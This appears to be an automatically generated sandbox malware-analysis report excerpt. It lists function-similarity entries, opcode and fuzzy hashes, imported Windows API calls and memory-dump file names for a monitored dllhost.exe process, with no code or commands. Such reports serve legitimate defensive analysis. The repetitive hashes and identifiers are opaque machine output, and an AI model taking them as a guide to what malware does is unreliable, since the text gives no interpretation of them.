                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                              • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                              • API String ID: 740688525-1880043860
                              • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                              • Instruction ID: a6d02871b38982e53333aee070536ca563bf2065ad48bb7d31305a1d20a3b887
                              • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                              • Instruction Fuzzy Hash: 7E51B321700F2495EE34EF969C183A522A0BB69BB3F5847269E3D873D4DF39C447C248
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                              • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                              • API String ID: 740688525-1880043860
                              • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                              • Instruction ID: 5a350e2ab4387a36b47d7cc6d9905231e7147eaa19328ef6dd617ab121339828
                              • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                              • Instruction Fuzzy Hash: 1051A321701F6491EA359BD69E083A9A350BF69BB3F480726FE39873D0DF38D485C648
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: Heap$CounterInfoProcess$AllocFree
                              • String ID: \GPU Engine(*)\Running Time
                              • API String ID: 1943346504-1805530042
                              • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                              • Instruction ID: 11f9eb63f92c52a7d94c74c3185617a717289839535154da9b149466f3e95398
                              • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                              • Instruction Fuzzy Hash: 2C31C226600F6096EB31EF92AD18799E3A0FBA8B87F448126DE49C3725DF38C457C344
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: Heap$CounterInfoProcess$AllocFree
                              • String ID: \GPU Engine(*)\Running Time
                              • API String ID: 1943346504-1805530042
                              • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                              • Instruction ID: 38f655867b64cf70a1896ca0e592bddf8c2d87af82f7080d933a4f7851b34863
                              • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                              • Instruction Fuzzy Hash: 3431C222600E6196E731CF92EE08759E7A0FBA8BC7F448126FE4983724DF38D495C308
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: Heap$CounterInfoProcess$AllocFree
                              • String ID: \GPU Engine(*)\Utilization Percentage
                              • API String ID: 1943346504-3507739905
                              • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                              • Instruction ID: 84075f0257fb664691be9d44846d48c13fc7120fba64147c04bb4ce3d580dfb3
                              • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                              • Instruction Fuzzy Hash: 7E317331610F659AEB24EFA2AC58759A3E0FBA4F97F448126DE4A83724DF38C457C704
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: Heap$CounterInfoProcess$AllocFree
                              • String ID: \GPU Engine(*)\Utilization Percentage
                              • API String ID: 1943346504-3507739905
                              • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                              • Instruction ID: d3f10881ed68cb348869dd82af4ccebba7ed5d96b5228bee96d81cc9befbc825
                              • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                              • Instruction Fuzzy Hash: 67318021610F6186E720DFA2EE48759A3A0FBA4F97F449026FE5A83724DF38D485C704
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2962940378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                              • Associated: 00000026.00000002.2961669704.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2964269024.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2965601829.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                              Similarity
                              • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                              • String ID:
                              • API String ID: 4184240511-0
                              • Opcode ID: c322ffdba1650a2f2ae2605316e9b34693b952877218ba9b1551f4330c074e45
                              • Instruction ID: e7c2dfd052af18fd3abcefe0f72c8446b9113f84b0d7c840ae7e34f71e75c1d0
                              • Opcode Fuzzy Hash: c322ffdba1650a2f2ae2605316e9b34693b952877218ba9b1551f4330c074e45
                              • Instruction Fuzzy Hash: FF4146B2704A859AE711CF6AF8443DD63B1FB89B99F445225BF0A43A69DF38C159C304
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                              • String ID: csm$csm$csm
                              • API String ID: 849930591-393685449
                              • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                              • Instruction ID: d3e8455ef971ef9dfab9870e7e34315ffe4a89d5c114f04ef6ead15e174fffc2
                              • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                              • Instruction Fuzzy Hash: 1CD1A372604F508AEF30DFA5D8683AD77A0F7A57CAF104116DE8997B96DB35C482C708
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000003.2596028752.0000025DC1A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025DC1A90000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_3_25dc1a90000_dllhost.jbxd
                              Similarity
                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                              • String ID: csm$csm$csm
                              • API String ID: 849930591-393685449
                              • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                              • Instruction ID: 3f31792923619c66734155cc38f09450e400eecd0182e2b11648118c18b1fa32
                              • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                              • Instruction Fuzzy Hash: AED19132604B6496EB70DFA5D88839D37A0F76578AF100116EE8997B9ADF38C0D3C748
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                              • String ID: csm$csm$csm
                              • API String ID: 849930591-393685449
                              • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                              • Instruction ID: 825ea2800baecdc338ddfada6da6adfeb040042a4f82c768ede2c8e086ff6e2c
                              • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                              • Instruction Fuzzy Hash: ECD1A332504F908AEB30DFA5D94939DB7A4FBA678AF101116FE8997B95CB34C4C0CB04
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                              • String ID: d
                              • API String ID: 3743429067-2564639436
                              • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                              • Instruction ID: 583f668019d724963af80605361ae3d41cf3ba93d383c24edd8b6b9c28e4161f
                              • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                              • Instruction Fuzzy Hash: 8C419033214F80DAEB60DF61E85839A77B1F389B9AF44811ADA8947758DF3DC446CB04
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2962940378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                              • Associated: 00000026.00000002.2961669704.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2964269024.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2965601829.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                              Similarity
                              • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                              • String ID: d
                              • API String ID: 3743429067-2564639436
                              • Opcode ID: 435c76a4378829ae359b2b91fc268e6eea08dc0b264376e4228dac23cbb25988
                              • Instruction ID: 03f89dd543fa71545bde49b2618b44e89e47b203f0d8546e2499baea92addc30
                              • Opcode Fuzzy Hash: 435c76a4378829ae359b2b91fc268e6eea08dc0b264376e4228dac23cbb25988
                              • Instruction Fuzzy Hash: D1412AB2614B84C6E765CF62F4447DA77A1F388B98F448129EB8907B68DF38C589CB40
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                              • String ID: d
                              • API String ID: 3743429067-2564639436
                              • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                              • Instruction ID: 8cf4101336de69d39b66bcd0350f4050413b4cfc2622334bc1f5f6bcc6dacbd7
                              • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                              • Instruction Fuzzy Hash: 1941B373214F80C6E760CFA1E94879EB7A1F389B8AF448116EB8947758DF38C485CB04
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                              • String ID: \\.\pipe\$rbx-childproc
                              • API String ID: 166002920-1828357524
                              • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                              • Instruction ID: 82d0d4ec9a487e7a08364d8f12726fb1e32ee536505f281c350188cd3be9f0dc
                              • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                              • Instruction Fuzzy Hash: F4113A32614F50C2E720DB61F85835A7770F799BA7F944216EA9982BA8CF3CC14ACB44
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                              • String ID: \\.\pipe\$rbx-childproc
                              • API String ID: 166002920-1828357524
                              • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                              • Instruction ID: 9663626f580ba14fe8b62036fcc7097086aaf728f643182d95d3ea9056aa6c00
                              • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                              • Instruction Fuzzy Hash: A0114C32614B50C2E720CB61FA5875AB760F799BD6F940316FB5A82BA8CF3CC144CB48
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                              • String ID:
                              • API String ID: 190073905-0
                              • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                              • Instruction ID: c7527366ca1727aaa5aa45f06d1c47d3e4024756d7df73bde20cb4e2c8c7812d
                              • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                              • Instruction Fuzzy Hash: B481E121600F3186FE74EBE69C6936962E0BBB1783F4440179A09C7396DF3AC857C708
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000003.2596028752.0000025DC1A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025DC1A90000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_3_25dc1a90000_dllhost.jbxd
                              Similarity
                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                              • String ID:
                              • API String ID: 190073905-0
                              • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                              • Instruction ID: 9ea26ee7aae33351cf769d29042c58c0d5d9ff325487fb3c318ea3293413ac6f
                              • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                              • Instruction Fuzzy Hash: B081D560600F7046FA74DBE5BC4939D2691ABB6783F184027A909C7396DB38C8C7CF28
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                              • String ID:
                              • API String ID: 190073905-0
                              • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                              • Instruction ID: d43931c4ff1abc2d83c0a9c8dbebc866e76321360bb7e7bac24c56c24e5d60bc
                              • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                              • Instruction Fuzzy Hash: 8F81C621600F6186FA709BE59E8D359E690BF75B87F444017FA09C7396DB38C9E5C348
                              APIs
                              • LoadLibraryExW.KERNEL32(?,?,?,0000025DC1AC9C6B,?,?,?,0000025DC1AC945C,?,?,?,?,0000025DC1AC8F65), ref: 0000025DC1AC9B31
                              • GetLastError.KERNEL32(?,?,?,0000025DC1AC9C6B,?,?,?,0000025DC1AC945C,?,?,?,?,0000025DC1AC8F65), ref: 0000025DC1AC9B3F
                              • LoadLibraryExW.KERNEL32(?,?,?,0000025DC1AC9C6B,?,?,?,0000025DC1AC945C,?,?,?,?,0000025DC1AC8F65), ref: 0000025DC1AC9B69
                              • FreeLibrary.KERNEL32(?,?,?,0000025DC1AC9C6B,?,?,?,0000025DC1AC945C,?,?,?,?,0000025DC1AC8F65), ref: 0000025DC1AC9BD7
                              • GetProcAddress.KERNEL32(?,?,?,0000025DC1AC9C6B,?,?,?,0000025DC1AC945C,?,?,?,?,0000025DC1AC8F65), ref: 0000025DC1AC9BE3
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: Library$Load$AddressErrorFreeLastProc
                              • String ID: api-ms-
                              • API String ID: 2559590344-2084034818
                              • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                              • Instruction ID: 22f7c187993d097fabf22fe213ab63450a834abfa8b9a524b58ac52e57fa4db1
                              • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                              • Instruction Fuzzy Hash: DD31E621212F60E1EE31DB92DC1839523A4B764BA3F990526ED1E8B790DF39C446C31C
                              APIs
                              • LoadLibraryExW.KERNEL32(?,?,?,0000025DC1CE9C6B,?,?,?,0000025DC1CE945C,?,?,?,?,0000025DC1CE8F65), ref: 0000025DC1CE9B31
                              • GetLastError.KERNEL32(?,?,?,0000025DC1CE9C6B,?,?,?,0000025DC1CE945C,?,?,?,?,0000025DC1CE8F65), ref: 0000025DC1CE9B3F
                              • LoadLibraryExW.KERNEL32(?,?,?,0000025DC1CE9C6B,?,?,?,0000025DC1CE945C,?,?,?,?,0000025DC1CE8F65), ref: 0000025DC1CE9B69
                              • FreeLibrary.KERNEL32(?,?,?,0000025DC1CE9C6B,?,?,?,0000025DC1CE945C,?,?,?,?,0000025DC1CE8F65), ref: 0000025DC1CE9BD7
                              • GetProcAddress.KERNEL32(?,?,?,0000025DC1CE9C6B,?,?,?,0000025DC1CE945C,?,?,?,?,0000025DC1CE8F65), ref: 0000025DC1CE9BE3
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: Library$Load$AddressErrorFreeLastProc
                              • String ID: api-ms-
                              • API String ID: 2559590344-2084034818
                              • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                              • Instruction ID: a1d2b37b0a6217c8ec8bedd44a83cab24a1856824bb8a5c685908dd413a92a6d
                              • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                              • Instruction Fuzzy Hash: 41319421312F60D1EE31DB869E08795A394BB65BA3F990626FD19C7B90DF38C484C358
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
